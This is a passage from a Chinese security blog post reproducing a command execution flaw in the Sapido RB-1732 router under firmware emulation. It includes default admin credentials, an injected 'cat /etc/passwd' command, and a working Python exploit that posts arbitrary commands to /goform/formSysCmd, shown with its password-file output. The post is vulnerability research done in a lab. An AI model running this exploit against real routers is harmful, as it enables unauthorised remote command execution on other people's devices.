<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">snprintf</span><span class="params">(<span class="type">char</span> *str, <span class="type">size_t</span> size, <span class="type">const</span> <span class="type">char</span> *format, ...)</span>;</span><br></pre></td></tr></table></figure>

<p>函数参数的含义如下：</p>
<ul>
<li><code>str</code>：目标字符数组的指针，即需要将格式化的字符串输出到该数组中。</li>
<li><code>size</code>：目标字符数组的长度，即字符数组能够存储的最大字符数，包括末尾的空字符 ‘\0’，防止写入超过该长度的字符以防止缓冲区溢出。</li>
<li><code>format</code>：格式化字符串，包含了输出的格式以及需要输出的变量值。</li>
<li><code>...</code>：可变参数列表，即需要输出到格式化字符串中的变量值。格式化字符串中使用占位符（如 %d、%f 等）来表示变量值的类型和输出格式，可变参数列表中的值按照占位符的顺序输出到格式化字符串中。</li>
</ul>
<p>该函数的返回值为实际写入字符数组的字符数（不包括末尾的空字符 ‘\0’）。如果实际写入的字符数超过了给定的最大字符数 size，则会在字符数组末尾添加空字符 ‘\0’，并返回应该写入字符数组的字符数（不包括末尾的空字符 ‘\0’）。如果出现其他错误，例如无法分配内存，则返回一个负数。</p>
<p>下面是一个使用snprintf函数的例子：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> buffer[<span class="number">20</span>];</span><br><span class="line"><span class="type">int</span> n = <span class="built_in">snprintf</span>(buffer, <span class="number">20</span>, <span class="string">&quot;%s %d&quot;</span>, <span class="string">&quot;hello&quot;</span>, <span class="number">123</span>);</span><br><span class="line"><span class="comment">// 将字符串 &quot;hello 123&quot; 格式化输出到 buffer 中</span></span><br><span class="line"><span class="comment">// 如果 buffer 的长度为 20，将不会溢出</span></span><br><span class="line"><span class="comment">// n 的值为 9，表示实际写入 buffer 的字符数，不包括末尾的空字符 &#x27;\0&#x27;</span></span><br></pre></td></tr></table></figure>





<h2 id="0x03-漏洞复现"><a href="#0x03-漏洞复现" class="headerlink" title="0x03 漏洞复现"></a>0x03 漏洞复现</h2><p>漏洞复现的第一步就是先在本地搭建固件模拟环境，这里使用FAT（Firmware Analysis Toolkit）搭建模拟环境。首先使用FAT将 bin 固件加载进来，模拟固件环境。</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212103976.png" alt="image-20230330212103976"></p>
<p>FAT在启动之后，会自动配置QEMU虚拟机以及网络环境，如上图，我们可以看到倒数第三行，bro 虚拟网卡的网络地址为 192.168.1.1 。我们按下ENTER键，稍等片刻，当看到下图所示内容时就表示环境已经部署好了。</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212544971.png" alt="image-20230330212544971"></p>
<p>此时，我们在浏览器中访问 192.168.1.1 这个地址后，会自动跳转到 &#x2F;admin.asp ，显示路由器的管理页面</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212701368.png" alt="image-20230330212701368"></p>
<p>默认账号密码为 admin：admin，我们输入账号密码登录后，页面显示如下：</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212825200.png" alt="image-20230330212825200"></p>
<p>接下来，我们访问有漏洞的页面 &#x2F;syscmd.asp ，如下图所示：</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212934163.png" alt="image-20230330212934163"></p>
<p>看到这个页面，再看我们之前看到的 syscmd.asp 的源码就容易理解多了。我们在 input 框输入命令 cat &#x2F;etc&#x2F;passwd</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330213129801.png" alt="image-20230330213129801"></p>
<p>可以看到，命令成功执行。</p>
<p>我们可以抓包来看一下</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330215625346.png" alt="image-20230330215625346"></p>
<p>可以看到 sysCmd 参数就是传递我们命令的参数，从第一行也可以看到，真正执行命令的后台程序为 &#x2F;goform&#x2F;formSysCmd 。感觉也是为我们分析漏洞多了一种思路。</p>
<p>我们也可以通过exploit脚本来攻击该漏洞：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#rb1732_exploit.py</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">test_httpcommand</span>(<span class="params">ip, command</span>):</span><br><span class="line">    my_data = &#123;<span class="string">&#x27;sysCmd&#x27;</span>: command, <span class="string">&#x27;apply&#x27;</span>:<span class="string">&#x27;Apply&#x27;</span>, <span class="string">&#x27;submit-url&#x27;</span>:<span class="string">&#x27;/syscmd.asp&#x27;</span>, <span class="string">&#x27;msg&#x27;</span>:<span class="string">&#x27;&#x27;</span>&#125;</span><br><span class="line">    r = requests.post(<span class="string">&#x27;http://%s/goform/formSysCmd&#x27;</span> % ip, data = my_data)</span><br><span class="line">    content = r.text</span><br><span class="line">    content = content[</span><br><span class="line">        content.find(<span class="string">&#x27;textarea row=&quot;15&quot; name=&quot;msg&quot; cols=&quot;80&quot; wrap=&quot;virtual&quot;&gt;&#x27;</span>)+<span class="number">56</span>:content.rfind(<span class="string">&#x27;&lt;/textarea&gt;&#x27;</span>)</span><br><span class="line">    ]</span><br><span class="line">    <span class="keyword">return</span> content</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> test_httpcommand(sys.argv[<span class="number">1</span>],<span class="string">&quot; &quot;</span>.join(sys.argv[<span class="number">2</span>:]))</span><br></pre></td></tr></table></figure>

<p>执行结果如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">iot@attifyos ~/D/firmware&gt; python rb1732_exploir.py <span class="number">192.168</span><span class="number">.1</span><span class="number">.1</span> <span class="string">&quot;cat /etc/passwd&quot;</span></span><br><span class="line">root:x:<span class="number">0</span>:<span class="number">0</span>:root:/:/<span class="built_in">bin</span>/sh</span><br><span class="line">nobody:x:<span class="number">0</span>:<span class="number">0</span>:nobody:/:/dev/null</span><br><span class="line">ftp:x:<span class="number">501</span>:<span class="number">501</span>::/var/home/anonymous:/dev/null</span><br><span class="line">ftpuser:x:<span class="number">502</span>:<span class="number">502</span>::/var/home:/dev/null</span><br><span class="line">admin:x:<span class="number">503</span>:<span class="number">503</span>::/home:/dev/null</span><br></pre></td></tr></table></figure>



<h2 id="0x04-参考链接"><a href="#0x04-参考链接" class="headerlink" title="0x04 参考链接"></a>0x04 参考链接</h2><p><a target="_blank" rel="noopener" href="http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_6142.html">http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_6142.html</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90or%E5%A4%8D%E7%8E%B0/" rel="tag"># 漏洞分析or复现</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/03/28/IoT/%E7%89%A9%E8%81%94%E7%BD%91%E5%AE%89%E5%85%A8%E5%85%A5%E9%97%A8/IoT%E5%AE%89%E5%85%A8%E5%85%A5%E9%97%A808/" rel="prev" title="IoT安全入门08">
      <i class="fa fa-chevron-left"></i> IoT安全入门08
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/04/01/IoT/IoT%20%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/D-Link-DIR-815%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E/" rel="next" title="D-Link_DIR-815后门漏洞">
      D-Link_DIR-815后门漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Sapido-RB-1732%E8%B7%AF%E7%94%B1%E5%99%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">Sapido RB-1732路由器命令执行漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.1.</span> <span class="nav-text">0x01 漏洞介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">1.2.</span> <span class="nav-text">0x02 漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9B%BA%E4%BB%B6%E8%8E%B7%E5%8F%96"><span class="nav-number">1.2.1.</span> <span class="nav-text">固件获取</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="nav-number">1.2.2.</span> <span class="nav-text">环境配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">1.2.3.</span> <span class="nav-text">漏洞分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">1.3.</span> <span class="nav-text">0x03 漏洞复现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="nav-number">1.4.</span> <span class="nav-text">0x04 参考链接</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="郭小白QAQ"
      src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/202303122318253.jpg">
  <p class="site-author-name" itemprop="name">郭小白QAQ</p>
  <div class="site-description" itemprop="description">精彩不亮丽，起落是无常</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">64</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="/guoxb0_0@qq.com" title="E-Mail → guoxb0_0@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">郭小白QAQ</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">122k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">7:24</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  
<script src="https://cdn.jsdelivr.net/npm/darkmode-js@1.5.7/lib/darkmode-js.min.js"></script>

<script>
var options = {
  bottom: '64px',
  right: 'unset',
  left: '32px',
  time: '0.5s',
  mixColor: 'transparent',
  backgroundColor: 'transparent',
  buttonColorDark: '#100f2c',
  buttonColorLight: '#fff',
  saveInCookies: true,
  label: '🌓',
  autoMatchOsTheme: true
}
const darkmode = new Darkmode(options);
window.darkmode = darkmode;
darkmode.showWidget();
</script>
<div class="moon-menu">
  <div class="moon-menu-items">
    
    <div id="moon-menu-item-back2bottom" class="moon-menu-item">
      <i class='fas fa-chevron-down'></i>    </div>
    
    <div id="moon-menu-item-back2top" class="moon-menu-item">
      <i class='fas fa-chevron-up'></i>    </div>
    
  </div>
  <div class="moon-menu-button">
    <svg class="moon-menu-bg">
      <circle class="moon-menu-cricle" cx="50%" cy="50%" r="44%"></circle>
      <circle class="moon-menu-border" cx="50%" cy="50%" r="48%"></circle>
    </svg>
    <div class="moon-menu-content">
      <div class="moon-menu-icon"><i class='fas fa-ellipsis-v'></i></div>
      <div class="moon-menu-text"></div>
    </div>
  </div>
</div><script src="/js/injector.js"></script>
</body>
</html>
